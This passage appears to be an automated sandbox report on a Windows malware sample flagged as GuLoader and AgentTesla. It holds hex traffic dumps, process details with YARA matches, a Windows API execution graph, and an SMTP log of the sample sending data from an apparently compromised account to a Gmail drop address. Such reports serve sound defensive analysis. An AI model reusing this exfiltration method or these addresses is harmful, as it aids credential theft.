7c 9d e3 e8 3e f5 10 02 c7 b5 76 df b0 5b 77 57 b6 34 ac e8 f5 18 c4 64 b9 f8 3a 99 00 d2 79 5f d8 37 0a b6 35 81 ff ad 87 77 c6 a1 fd 72 d3 45 22 55 48 13 d0 a5 dc a8 19 5a
                                                                                    Data Ascii: IaYiDk5CW2TW*cZ 6ausLOWa~QmG<i3. C.OspilQHn}J<7gMD;i]6"Ih:C}8)hX%J&xDve:K e>|>v[wW4d:y_75wrE"UHZ
                                                                                    2022-05-10 20:11:05 UTC209INData Raw: 2e 30 23 d6 58 08 40 1b 92 2f cd d3 46 ef f4 92 80 07 65 36 f3 e9 52 bf d2 50 6e 39 c2 f6 05 b5 0a ae ef 70 30 ca ec 85 84 ce 02 dc 7f 4f f7 4e 2b e3 79 df af b4 3a ad 7e e6 29 ac 5d 64 9a 6a e5 52 9c 80 9a ce 2e 98 f7 67 10 39 78 6c 3f e9 f5 36 9a 88 75 ec 05 24 0b 9a f2 96 9f 19 cc 94 ff a3 4a 15 59 00 c1 bf f5 da d4 6a de 61 a3 e6 01 34 87 13 6d 4b 4b 65 19 50 95 3b ec cd ed d1 47 90 32 a0 cc 37 d5 72 84 6b fe 2f 8f 7b 17 2d 05 c9 aa fe 89 b4 7d d6 75 22 31 4b 4a e5 52 d9 38 a5 fa e3 71 0c 3f a3 8a 24 fc 60 d5 e3 90 69 15 55 1d b7 76 73 a7 23 58 81 9d 84 9c c9 ef d0 f3 89 1b 8f da 1e 02 aa 56 aa 02 19 02 df 16 09 0f 7c 1d f5 ce f3 d4 07 85 c8 df a6 9b 45 f1 c1 ca 54 97 be 87 8f 2f 4f ae d3 1a 55 24 b4 cf 6a 19 4b 83 8c 8b d0 d0 06 38 ec b4 d8 78 d1 be
                                                                                    Data Ascii: .0#X@/Fe6RPn9p0ON+y:~)]djR.g9xl?6u$JYja4mKKeP;G27rk/{-}u"1KJR8q?$`iUvs#XV|ET/OU$jK8x
                                                                                    2022-05-10 20:11:05 UTC209INData Raw: 44 7e b9 d3 7c 13 dc 08 aa 3a f5 b5 90 f9 8a fc c1 82 df f0 98 9a cb 4e c2 eb 60 fe e4 41 13 f8 11 e1 f0 a6 3b 60 47 95 4a 98 02 fd 5e 97 32 e0 70 3b 8c b5 2d db 72 e0 41 31 18 19 68 cf 47 99 0e 29 bf f6 14 96 22 2f 9e 9d fe d6 71 a5 2d 50 5d 65 67 cc d7 6f 1a 3d 15 6a 2e ea c0 a4 82 ca 90 38 90 f5 ab 04 00 be f6 84 70 e4 ef e0 9f 41 87 9e ca 7c 2a 53 97 42 8e fe 7d b5 62 0c 83 6d ac 2a 35 2f d6 67 09 59 09 12 af c3 f5 2a f4 eb 9c a1 13 7c 34 ee e7 7e ba d2 4e 60 63 ff fd 18 a8 16 b2 ce 64 02 d3 ec 89 8c c7 0c c0 6f 4e f7 57 37 f3 4e d9 ba 88 20 b3 71 95 12 bf 4d 03 98 03 ff 3e 92 ff b2 c5 21 e5 f8 08 1f 4a 5f 07 2f 82 fa 28 9a 6c e9 fb 80 f1 18 f2 e5 e3 99 18 d1 83 88 be 4d 18 4b 12 d1 ad 76 59 db 7a dd 7d bf f4 1a 28 99 01 7e 59 58 62 27 52 9c 20 e1 d9
                                                                                    Data Ascii: D~|:N`A;`GJ^2p;-rA1hG)"/q-P]ego=j.8pA|*SB}bm*5/gY*|4~N`cdoNW7N qM>!J_/(lMKvYz}(~YXb'R
                                                                                    2022-05-10 20:11:05 UTC211INData Raw: a6 57 10 62 c9 c6 7f ff 02 6a f9 9d 24 9c 6e 14 6f 9e 89 02 91 ee 5a 1d e0 c8 70 34 49 24 5d 4e 65 62 c2 18 37 37 61 d1 32 e7 89 4d dc 95 e7 7b 7e 01 b6 c4 eb 6a f0 a5 d7 b3 6f da d9 d1 64 e9 9f 71 bf fb 02 8e 06 75 be 6c 6d 46 cc d2 99 5e 36 d9 85 b3 54 e8 37 95 10 36 9a 5e c7 54 c0 53 8a 45 44 4d da ae e1 b4 f2 0c 68 13 b1 ba ff 6c 20 a2 a1 0c ec ad 2a 0e 2b 1f 3c 9c 06 db d7 f0 fa 58 10 23 45 a3 f3 3d 83 08 5e c4 0e f8 da 23 ec 88 5f ae 07 1e 99 b4 d3 40 59 86 f1 10 f6 8b 10 ca 29 fa 31 d1 2b 1b 6c 17 04 72 c1 94 dd 15 10 f5 af 98 22 02 7d 2c f6 72 11 60 c6 ea 7e cb 4b bf 72 b9 90 93 c0 d0 22 78 85 63 85 ae f8 cc e0 6e f1 08 8f 20 a4 0c 1b 6a f4 14 2d 4e e5 e6 a8 61 0f 46 8d 86 f8 05 6b e2 22 42 30 03 c6 48 0a 47 a3 96 0c 32 a7 ab b2 50 4a 9d d3 c9 1a
                                                                                    Data Ascii: Wbj$noZp4I$]Neb77a2M{~jodqulmF^6T76^TSEDMhl *+<X#E=^#_@Y)1+lr"},r`~Kr"xcn j-NaFk"B0HG2PJ
                                                                                    2022-05-10 20:11:05 UTC212INData Raw: df 8e fe db 10 63 fa 1f 9f d9 d2 99 6d e9 f9 e5 4a 0c ea 91 49 ef b2 ab 41 43 83 52 9d 1a e3 5e 93 3c c1 61 1b 8f b1 ad d3 79 e7 4b 1f 15 05 e8 7f d7 22 12 35 3b 53 0a 91 1e 3e 9d 88 7c d6 7c 99 2d 42 df d6 ee a1 ca 5d 99 85 0c 62 04 ec cd b8 0e 7a 18 06 8e e9 22 34 32 3f d1 0d 74 e1 ed e3 8d 5f 9e 9a ca 6f a5 7a 89 42 85 f9 06 34 68 0f 83 67 82 25 39 3c ca 6e 0e 50 0a 11 9b dd e9 4d e0 eb 8e b7 2f 61 23 e1 79 df b8 c6 52 6f 70 cd e6 17 36 ba be dd 78 3c ee ee 98 9d 44 b3 de 6d 4e ec 4a 2c f4 6a 55 12 96 33 b3 64 80 25 b0 ce 34 9a 83 13 25 89 e7 89 de 2e 7b e8 04 0c 56 64 0b 30 86 f3 25 9d fc ea 5c 02 2a 04 93 fe ed 92 1e c9 88 88 a9 58 7d 4a 00 c2 bf f4 d5 d4 6a d3 73 a4 ed 12 26 05 84 62 4b 58 6e 2b d0 2d 35 9d d9 4c 71 40 a2 b3 37 4a aa da 76 a9 6d ec
                                                                                    Data Ascii: cmJIACR^<ayK"5;S>||-B]bz"42?t_ozB4hg%9<nPM/a#yRop6x<DmNJ,jU3d%4%.{Vd0%\*X}Jjs&bKXn+-5Lq@7Jvm
                                                                                    2022-05-10 20:11:05 UTC213INData Raw: 8e 83 54 67 8b 85 87 92 f1 51 1d e3 99 60 24 49 24 45 51 6e 6a d5 87 3f 3d 67 cd bd eb 86 ca 70 92 f4 6b 64 85 9b c7 f8 61 e0 b5 c2 31 db dd d4 cd 76 68 8f 76 ac f0 16 9e 1c f3 0b ee 63 54 59 95 98 56 22 49 b2 90 47 ff ab d0 09 7f 88 c9 f0 ca c0 4c 9c 43 77 4d d2 aa 71 06 f1 2e 67 00 21 78 c1 49 00 b7 a2 0d dc a7 19 0d 25 1b 28 8c 1f 50 d2 f2 f0 57 94 7e 44 9e f6 26 93 9e 6c ca 03 83 df 3f fa 09 7a b2 15 7e 83 b4 d3 59 59 9f e4 1a f7 ae 12 da ae cd 24 d1 36 1f 7d 15 0c 68 c3 8b d1 89 91 eb ba 87 2d 0a 40 2b ea 79 11 60 d5 ef 76 d6 4b b0 42 a5 0f 96 cf 5c 2a 77 b3 77 99 b7 f9 d4 ec 71 f2 03 82 34 a2 1a 13 7b 77 90 29 5a 64 a4 a1 6f 9c ea 8a 94 7b 58 60 f0 22 4b 3f 1d de 43 05 c3 ab 82 04 2d b4 b2 b3 49 45 19 cb dc 59 4e 5f 4b 27 e5 cc 66 07 c8 7b bd fd c7
                                                                                    Data Ascii: TgQ`$I$EQnj?=gpkda1vhvcTYV"IGLCwMq.g!xI%(PW~D&l?z~YY$6}h-@+y`vKB\*wwq4{w)Zdo{X`"K?C-IEYN_K'f{
                                                                                    2022-05-10 20:11:05 UTC215INData Raw: 5d f1 f8 57 09 e4 0e e2 f1 a6 d7 18 4f d4 4c b0 1f f1 df 0a 39 f3 e0 5b 9a a7 ac 4a 78 f5 c6 7f 0b 19 77 d0 db ae 1d 29 a5 ea 04 14 0b 37 94 91 fc cb 7e ab a9 10 41 6b e4 b1 dc 47 13 28 12 6c 2a ff 44 ea 9e b2 19 09 85 e6 ad 1c 3c a3 f8 18 73 e9 f2 fe 91 dc db 8f db fc 81 4e 81 c4 cf e1 34 b2 64 03 9c e9 79 3a b7 d8 d5 e3 39 5a 1c 87 20 d1 fa 4b f5 fe 9d b4 12 69 2b fb f3 66 b2 c8 5a 74 6c c2 fb 0d a6 62 b4 db 7e 2a c6 eb 8d 8e c4 08 d2 57 49 ed 5e 39 60 e2 d6 b5 15 7d b3 62 92 35 23 d6 00 9a 82 b7 31 80 e3 9a c5 34 e4 e0 0e 1f 5d 77 00 25 9a 7c 6b 9a 84 60 e1 0a 23 02 95 ed ed 95 11 c2 8e 8e bc 4d 18 4b 1c 46 86 f9 c9 df 79 d8 7c a6 fa 85 bd 99 18 7e 40 57 e2 18 4f 91 35 9d cc cd d2 5a 9f b7 38 cd 06 d3 7b 87 65 e3 2f 95 f7 9c 21 1c cc b9 7f ba a0 14 d2
                                                                                    Data Ascii: ]WOL9[Jxw)7~AkG(l*D<sN4dy:9Z Ki+fZtlb~*WI^9`}b5#14]w%|k`#MKFy|~@WO5Z8{e/!
                                                                                    2022-05-10 20:11:05 UTC216INData Raw: 6a 36 5e ae 40 5b 68 77 ce 05 33 37 7c d1 31 67 95 46 ec 97 ed 70 63 15 17 5c f7 61 e5 b5 c1 32 f7 de d4 cd 76 6b 1b 75 ac eb 0d 0a 97 70 b4 e2 63 4e d6 dd 92 4b 3b c5 0f 9a 47 e5 22 98 0a 5c 8f fc e0 41 cb 5f 0c c2 66 4a d1 ba 64 84 e5 ad 40 1d 80 3e cb 67 0e b3 32 a7 c4 24 33 1c b7 23 2b 9d 09 d1 d1 f8 fd 6d 15 34 44 b8 e7 b5 0a 8e 6e c0 0d 9e de 25 e8 8b 5f aa 00 17 9e b1 ca aa 47 83 f9 1c f8 9f 90 54 28 b4 39 d4 2b 1e 71 10 0a 75 c2 97 c8 95 8c f3 a7 95 25 0c 64 26 eb 77 0c 61 2b ef 70 d7 53 a2 78 ab 12 8e d2 a2 37 65 84 78 9e b1 e2 da e7 6a ea 1a 0a ac a0 04 1b 78 76 a1 2e 4f e1 ec bc 75 15 77 ab 87 f2 10 63 eb 26 47 3d 08 d3 51 0a 47 a3 96 04 38 bf 8e ad 5f 5f 90 8f ee 31 44 48 4f 3d fc da 71 12 dc 6e ba da c5 c0 f3 55 fa ab ad ce 5d d7 88 00 f7 65
                                                                                    Data Ascii: j6^@[hw37|1gFpc\a2vkupcNK;G"\A_fJd@>g2$3#+m4Dn%_GT(9+qu%d&wa+pSx7exjxv.Ouwc&G=QG8__1DHO=qnU]e
                                                                                    2022-05-10 20:11:05 UTC217INData Raw: 8c 4d 8c 18 62 c7 92 2a 61 8d 1f 89 a7 ad 06 7d e1 56 bf ef 14 6c c3 cf a4 15 35 38 83 1e 82 2c be 05 98 ec 57 9c bf 2f 54 54 7f ee b1 d4 4f 1a 32 91 11 2c e1 c2 ae 9e 5b f5 13 0d 2e b1 81 c4 b6 e1 05 71 f3 6f 06 84 5d 99 88 4a 99 2a 41 9a 42 8c fe 94 52 77 8d 69 61 86 2b 34 33 44 84 12 c5 ce 9d 2c d0 e0 46 f9 76 79 ae 8f 85 24 73 2e 7c 3a 31 5a 75 71 c8 e1 85 50 05 ad 53 8f 3f c9 ec 9f 0c 22 14 5c 9a 42 ff 48 39 61 9f c5 27 41 2c 3d 95 85 2f a5 4d 13 08 ef e5 bf 7f e6 a7 cf 2e 79 09 17 82 b0 64 0b 23 8e fa 29 9a 6d 84 e1 10 04 0f 89 63 0f 8a 99 24 88 94 27 9f 05 d6 37 ca b7 f0 d6 c8 e4 31 73 23 04 15 33 88 00 6d 4b 4d 6e 24 5c 9a 29 f7 c3 d0 de 4e 9f bc 2c e8 13 d5 62 09 85 f0 22 89 7d 1e 29 08 c0 a3 f6 8f ba 55 d0 75 aa b5 57 ce 7c 53 d6 aa 2c ea d1 f0
                                                                                    Data Ascii: Mb*a}Vl58,W/TTO2,[.qo]J*ABRwia+43D,Fvy$s.|:1ZuqPS?"\BH9a'A,=/M.yd#)mc$'71s#3mKMn$\)N,b"})UuW|S,
                                                                                    2022-05-10 20:11:05 UTC218INData Raw: cb a2 7f 9c 55 c4 98 f2 6c f7 0f 84 44 fe 7d 6c a8 c1 32 66 d7 cb 59 60 e2 8a 61 b0 7f 86 8a 1c f0 b2 eb 4d 47 ca 54 99 5e 36 cf 01 83 c8 e9 2e a0 02 5f 88 d5 e4 5c d7 cf 16 42 76 cd d3 b9 64 87 e5 ad 6d 1a a5 18 ca 78 81 a6 b5 ae d4 a4 1b 8c 32 11 26 9b 1b c1 5a 69 ff 57 94 36 48 b4 d6 35 87 98 ea 59 0c 8c 5b 2b e3 ab 5e af 12 05 1f 28 cf 57 c5 8b da 1f f1 9c 91 55 22 e6 b8 49 2e 1f 74 00 8b 7d d7 16 c8 9d 91 f2 af 98 20 04 7d 2c fe 66 8d c0 da fd f1 df 50 82 75 b9 93 17 dc 4e 30 45 84 6c 18 2e ec d9 ea 79 e6 8a 2f 01 b7 83 0e 6c de 09 39 c9 e1 ee 9c 7d 08 61 0a 1f fb 0a ef e4 28 43 25 82 9a 46 37 46 aa 8c 8e 71 a7 ab b2 50 5f 92 8c c8 38 5b 47 55 3f f1 d9 72 19 de 67 b7 f0 d7 ca f9 43 ef bc a3 c5 44 df 93 2a fd 72 13 47 8f bb 6e 6f fe 46 e8 bf 16 80 70
                                                                                    Data Ascii: UlD}l2fY`aMGT^6._\Bvdmx2&ZiW6H5Y[+^(WU"I.t} },fPuN0El.y/l9}a(C%F7FqP_8[GU?rgCD*rGnoFp
                                                                                    2022-05-10 20:11:05 UTC220INData Raw: 2d d3 79 e7 47 3f 16 17 6a de c6 a0 13 27 b9 f6 16 97 3e 3f 9c 99 fe d7 70 b9 28 50 5d 77 e6 b9 d2 4f 1b 20 10 64 24 ed c5 aa 8c db 11 01 8d fb a3 01 20 be e4 05 71 e1 ef e2 83 5d 9b 9a ca 7d 24 4f 93 45 8f ec 14 b6 65 0d 8d 69 8c 2b 37 21 c4 60 00 45 1b 93 2e df e7 43 e8 f6 80 bc 0f 61 36 f3 fb 6e ba d5 52 7c 71 ca f3 05 b4 0b bc d3 76 37 ce ee 8d 8c c6 06 dc 7e 4e ff 4b 2b e1 7b d7 a7 94 3d bd 6c 87 27 a2 4f 01 88 03 f7 3f 8e ed 87 cb 3c f9 e5 06 02 58 6a 05 2d 88 fd 2b 88 ed 68 e9 00 24 0a 9b e3 e3 9b 19 cc 86 86 a7 4a 14 57 0e c4 bd f7 c4 da 64 dd 41 a3 e8 87 2c 84 1d 63 7d 45 60 b9 52 94 27 f4 cb cd d0 46 82 b2 25 c8 17 d4 72 89 6c fe 2c 87 25 19 2f 81 c9 ab fc 87 b2 7d d7 67 a2 a0 45 4f e5 52 c5 2a c1 ff c3 71 76 bf 3e 0f 24 fd 61 c7 8a 94 69 14 54
                                                                                    Data Ascii: -yG?j'>?p(P]wO d$ q]}$OEei+7!`E.Ca6nR|qv7~NK+{=l'O?<Xj-+h$JWdA,c}E`R'F%rl,%/}gEOR*qv>$aiT
                                                                                    2022-05-10 20:11:05 UTC221INData Raw: d6 4f cd 80 f3 8f 1c ba ab ad 01 99 f6 11 c6 ae 6d e2 78 18 d6 89 0a 23 ab f5 e9 2e 5f a5 74 af 6b 98 58 fe 38 2c eb b4 87 24 a4 3d a2 2e 0d 2f a9 d0 10 ea 92 58 44 71 cf 55 f0 08 73 cf 9d f8 e6 87 34 00 3c 3a 01 b9 2e f3 fb d0 de 79 67 5b 31 cb 93 46 e6 ef 0f 85 75 fb b9 56 9c e2 30 c0 4b 72 e8 d4 a2 65 28 e6 8f 7d 92 b3 32 a9 5f bd 57 a2 44 71 14 60 28 55 b3 fe 8d f6 ef 92 d4 f6 18 2e 06 48 87 04 69 47 f4 d1 7d dd 77 82 57 8b 32 aa ee 7d 45 00 f7 0b fc c0 90 b4 86 3c 85 62 fc 69 c9 67 61 0c 85 37 25 42 c5 c4 94 5d 21 5c f8 e3 99 6d 1c 85 58 3c 09 0d d1 6d 37 7e 84 ea 7e 45 c9 da e6 3b 31 f7 b5 c3 3a 7a 6d 29 49 8a b4 17 78 b8 1f 81 f7 cd cb fb 5d ef ac bd c5 5a df 95 0a ff 6f 16 4f 81 b7 1d 6f 96 46 89 bf 23 80 41 39 f0 fd 21 f3 14 09 bf 3a 2c a0 b9 94
                                                                                    Data Ascii: Omx#._tkX8,$=./XDqUs4<:.yg[1FuV0Kre(}2_WDq`(U.HiG}wW2}E<biga7%B]!\mX<m7~~E;1:zm)Ix]ZoOoF#A9!:,


Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
May 10, 2022 22:12:46.709001064 CEST | 587 | 49769 | 77.246.191.210 | 192.168.11.20 | 220-cpanel501.servidoresdns3.net ESMTP Exim 4.95 #2 Tue, 10 May 2022 22:12:45 +0200
 |  |  |  |  | 220-We do not authorize the use of this system to transport unsolicited,
 |  |  |  |  | 220 and/or bulk e-mail.
May 10, 2022 22:12:46.709335089 CEST | 49769 | 587 | 192.168.11.20 | 77.246.191.210 | EHLO 141700
May 10, 2022 22:12:46.738776922 CEST | 587 | 49769 | 77.246.191.210 | 192.168.11.20 | 250-cpanel501.servidoresdns3.net Hello 141700 [102.129.143.39]
 |  |  |  |  | 250-SIZE 52428800
 |  |  |  |  | 250-8BITMIME
 |  |  |  |  | 250-PIPELINING
 |  |  |  |  | 250-PIPE_CONNECT
 |  |  |  |  | 250-AUTH PLAIN LOGIN
 |  |  |  |  | 250-STARTTLS
 |  |  |  |  | 250 HELP
May 10, 2022 22:12:46.740099907 CEST | 49769 | 587 | 192.168.11.20 | 77.246.191.210 | AUTH login YWRtaW5pc3RyYWNpb25AY29tYW5zaS5jb20=
May 10, 2022 22:12:46.770359039 CEST | 587 | 49769 | 77.246.191.210 | 192.168.11.20 | 334 UGFzc3dvcmQ6
May 10, 2022 22:12:46.838279963 CEST | 587 | 49769 | 77.246.191.210 | 192.168.11.20 | 235 Authentication succeeded
May 10, 2022 22:12:46.838928938 CEST | 49769 | 587 | 192.168.11.20 | 77.246.191.210 | MAIL FROM:<administracion@comansi.com>
May 10, 2022 22:12:46.868448019 CEST | 587 | 49769 | 77.246.191.210 | 192.168.11.20 | 250 OK
May 10, 2022 22:12:46.868910074 CEST | 49769 | 587 | 192.168.11.20 | 77.246.191.210 | RCPT TO:<federicornanetti1990@gmail.com>
May 10, 2022 22:12:47.071933985 CEST | 587 | 49769 | 77.246.191.210 | 192.168.11.20 | 250 Accepted
May 10, 2022 22:12:47.072268009 CEST | 49769 | 587 | 192.168.11.20 | 77.246.191.210 | DATA
May 10, 2022 22:12:47.101628065 CEST | 587 | 49769 | 77.246.191.210 | 192.168.11.20 | 354 Enter message, ending with "." on a line by itself
May 10, 2022 22:12:47.103949070 CEST | 49769 | 587 | 192.168.11.20 | 77.246.191.210 | .
May 10, 2022 22:12:47.136641026 CEST | 587 | 49769 | 77.246.191.210 | 192.168.11.20 | 250 OK id=1noWDv-006hia-BP
May 10, 2022 22:12:49.771874905 CEST | 49769 | 587 | 192.168.11.20 | 77.246.191.210 | QUIT
May 10, 2022 22:12:50.004125118 CEST | 587 | 49769 | 77.246.191.210 | 192.168.11.20 | 221 cpanel501.servidoresdns3.net closing connection
May 10, 2022 22:12:50.885008097 CEST | 587 | 49771 | 77.246.191.210 | 192.168.11.20 | 220-cpanel501.servidoresdns3.net ESMTP Exim 4.95 #2 Tue, 10 May 2022 22:12:50 +0200
 |  |  |  |  | 220-We do not authorize the use of this system to transport unsolicited,
 |  |  |  |  | 220 and/or bulk e-mail.
May 10, 2022 22:12:50.885515928 CEST | 49771 | 587 | 192.168.11.20 | 77.246.191.210 | EHLO 141700
May 10, 2022 22:12:50.915431976 CEST | 587 | 49771 | 77.246.191.210 | 192.168.11.20 | 250-cpanel501.servidoresdns3.net Hello 141700 [102.129.143.39]
                                                                                    250-SIZE 52428800
                                                                                    250-8BITMIME
                                                                                    250-PIPELINING
                                                                                    250-PIPE_CONNECT
                                                                                    250-AUTH PLAIN LOGIN
                                                                                    250-STARTTLS
                                                                                    250 HELP
                                                                                    May 10, 2022 22:12:50.915954113 CEST49771587192.168.11.2077.246.191.210AUTH login YWRtaW5pc3RyYWNpb25AY29tYW5zaS5jb20=
                                                                                    May 10, 2022 22:12:50.945972919 CEST5874977177.246.191.210192.168.11.20334 UGFzc3dvcmQ6
                                                                                    May 10, 2022 22:12:50.983189106 CEST5874977177.246.191.210192.168.11.20235 Authentication succeeded
                                                                                    May 10, 2022 22:12:50.983692884 CEST49771587192.168.11.2077.246.191.210MAIL FROM:<administracion@comansi.com>
                                                                                    May 10, 2022 22:12:51.013180971 CEST5874977177.246.191.210192.168.11.20250 OK
                                                                                    May 10, 2022 22:12:51.013530016 CEST49771587192.168.11.2077.246.191.210RCPT TO:<federicornanetti1990@gmail.com>
                                                                                    May 10, 2022 22:12:51.176805019 CEST5874977177.246.191.210192.168.11.20250 Accepted
                                                                                    May 10, 2022 22:12:51.177195072 CEST49771587192.168.11.2077.246.191.210DATA
                                                                                    May 10, 2022 22:12:51.206748962 CEST5874977177.246.191.210192.168.11.20354 Enter message, ending with "." on a line by itself
                                                                                    May 10, 2022 22:12:51.277113914 CEST5874977177.246.191.210192.168.11.20250 OK id=1noWDz-006hj7-Eo
                                                                                    May 10, 2022 22:14:21.926006079 CEST49771587192.168.11.2077.246.191.210QUIT
                                                                                    May 10, 2022 22:14:22.157042027 CEST5874977177.246.191.210192.168.11.20221 cpanel501.servidoresdns3.net closing connection

                                                                                    Target ID:1
                                                                                    Start time:22:10:33
                                                                                    Start date:10/05/2022
                                                                                    Path:C:\Users\user\Desktop\xcVh7ZmH4Y.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\xcVh7ZmH4Y.exe"
                                                                                    Imagebase:0x400000
                                                                                    File size:306502 bytes
                                                                                    MD5 hash:D17D180329065DF1BF54501A2C8E138B
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Author: Joe Security
                                                                                    Reputation:low

                                                                                    Target ID:3
                                                                                    Start time:22:10:51
                                                                                    Start date:10/05/2022
                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Users\user\Desktop\xcVh7ZmH4Y.exe"
                                                                                    Imagebase:0xb0000
                                                                                    File size:108664 bytes
                                                                                    MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:moderate

                                                                                    Target ID:4
                                                                                    Start time:22:10:51
                                                                                    Start date:10/05/2022
                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\xcVh7ZmH4Y.exe"
                                                                                    Imagebase:0xc90000
                                                                                    File size:108664 bytes
                                                                                    MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:.Net C# or VB.NET
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000000.26061242461.0000000001100000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.30951277125.000000001D8E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.30951277125.000000001D8E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: MALWARE_Win_AgentTeslaV3, Description: AgentTeslaV3 infostealer payload, Source: 00000004.00000002.30951277125.000000001D8E1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                    Reputation:moderate

                                                                                    Target ID:6
                                                                                    Start time:22:10:52
                                                                                    Start date:10/05/2022
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff66fef0000
                                                                                    File size:875008 bytes
                                                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:moderate

                                                                                      Execution Graph

                                                                                      Execution Coverage:10.1%
                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                      Signature Coverage:21.5%
                                                                                      Total number of Nodes:1911
                                                                                      Total number of Limit Nodes:47
7763 403636 7761->7763 7762->7760 7764 40690a 5 API calls 7763->7764 7765 40363d 7764->7765 7766 40690a 5 API calls 7765->7766 7767 403644 7766->7767 7768 40690a 5 API calls 7767->7768 7769 403650 #17 OleInitialize SHGetFileInfoW 7768->7769 7847 40653d lstrcpynW 7769->7847 7772 40369d GetCommandLineW 7848 40653d lstrcpynW 7772->7848 7774 4036af 7775 405e39 CharNextW 7774->7775 7776 4036d5 CharNextW 7775->7776 7784 4036e6 7776->7784 7777 4037e4 7778 4037f8 GetTempPathW 7777->7778 7849 4034fc 7778->7849 7780 403810 7781 403814 GetWindowsDirectoryW lstrcatW 7780->7781 7782 40386a DeleteFileW 7780->7782 7785 4034fc 12 API calls 7781->7785 7859 40307d GetTickCount GetModuleFileNameW 7782->7859 7783 405e39 CharNextW 7783->7784 7784->7777 7784->7783 7790 4037e6 7784->7790 7787 403830 7785->7787 7787->7782 7789 403834 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 7787->7789 7788 40387d 7791 403941 7788->7791 7794 403932 7788->7794 7798 405e39 CharNextW 7788->7798 7793 4034fc 12 API calls 7789->7793 7943 40653d lstrcpynW 7790->7943 7951 403b12 7791->7951 7797 403862 7793->7797 7887 403bec 7794->7887 7797->7782 7797->7791 7811 40389f 7798->7811 7800 403a69 7958 405b9d 7800->7958 7801 403a7e 7803 403a86 GetCurrentProcess OpenProcessToken 7801->7803 7804 403afc ExitProcess 7801->7804 7809 403acc 7803->7809 7810 403a9d LookupPrivilegeValueW AdjustTokenPrivileges 7803->7810 7806 403908 7813 405f14 18 API calls 7806->7813 7807 403949 7812 405b08 5 API calls 7807->7812 7814 40690a 5 API calls 7809->7814 7810->7809 7811->7806 7811->7807 7815 40394e lstrcatW 7812->7815 7816 403914 7813->7816 7817 403ad3 7814->7817 7818 40396a lstrcatW lstrcmpiW 7815->7818 7819 40395f lstrcatW 7815->7819 7816->7791 7944 40653d lstrcpynW 7816->7944 7820 403ae8 ExitWindowsEx 7817->7820 7821 403af5 7817->7821 7818->7791 7822 40398a 7818->7822 7819->7818 7820->7804 7820->7821 7962 40140b 7821->7962 7825 403996 7822->7825 7826 40398f 7822->7826 7829 405aeb 2 API calls 7825->7829 
7828 405a6e 4 API calls 7826->7828 7827 403927 7945 40653d lstrcpynW 7827->7945 7831 403994 7828->7831 7832 40399b SetCurrentDirectoryW 7829->7832 7831->7832 7833 4039b8 7832->7833 7834 4039ad 7832->7834 7947 40653d lstrcpynW 7833->7947 7946 40653d lstrcpynW 7834->7946 7837 40657a 17 API calls 7838 4039fa DeleteFileW 7837->7838 7839 403a06 CopyFileW 7838->7839 7840 4039c5 7838->7840 7839->7840 7840->7837 7841 403a50 7840->7841 7843 4062fd 36 API calls 7840->7843 7844 40657a 17 API calls 7840->7844 7846 403a3a CloseHandle 7840->7846 7948 405b20 CreateProcessW 7840->7948 7842 4062fd 36 API calls 7841->7842 7842->7791 7843->7840 7844->7840 7846->7840 7847->7772 7848->7774 7850 4067c4 5 API calls 7849->7850 7852 403508 7850->7852 7851 403512 7851->7780 7852->7851 7853 405e0c 3 API calls 7852->7853 7854 40351a 7853->7854 7855 405aeb 2 API calls 7854->7855 7856 403520 7855->7856 7965 40605c 7856->7965 7969 40602d GetFileAttributesW CreateFileW 7859->7969 7861 4030bd 7881 4030cd 7861->7881 7970 40653d lstrcpynW 7861->7970 7863 4030e3 7864 405e58 2 API calls 7863->7864 7865 4030e9 7864->7865 7971 40653d lstrcpynW 7865->7971 7867 4030f4 GetFileSize 7868 4031ee 7867->7868 7886 40310b 7867->7886 7972 403019 7868->7972 7870 4031f7 7872 403227 GlobalAlloc 7870->7872 7870->7881 7984 4034e5 SetFilePointer 7870->7984 7871 4034cf ReadFile 7871->7886 7983 4034e5 SetFilePointer 7872->7983 7874 40325a 7878 403019 6 API calls 7874->7878 7876 403210 7879 4034cf ReadFile 7876->7879 7877 403242 7880 4032b4 31 API calls 7877->7880 7878->7881 7882 40321b 7879->7882 7884 40324e 7880->7884 7881->7788 7882->7872 7882->7881 7883 403019 6 API calls 7883->7886 7884->7881 7884->7884 7885 40328b SetFilePointer 7884->7885 7885->7881 7886->7868 7886->7871 7886->7874 7886->7881 7886->7883 7888 40690a 5 API calls 7887->7888 7889 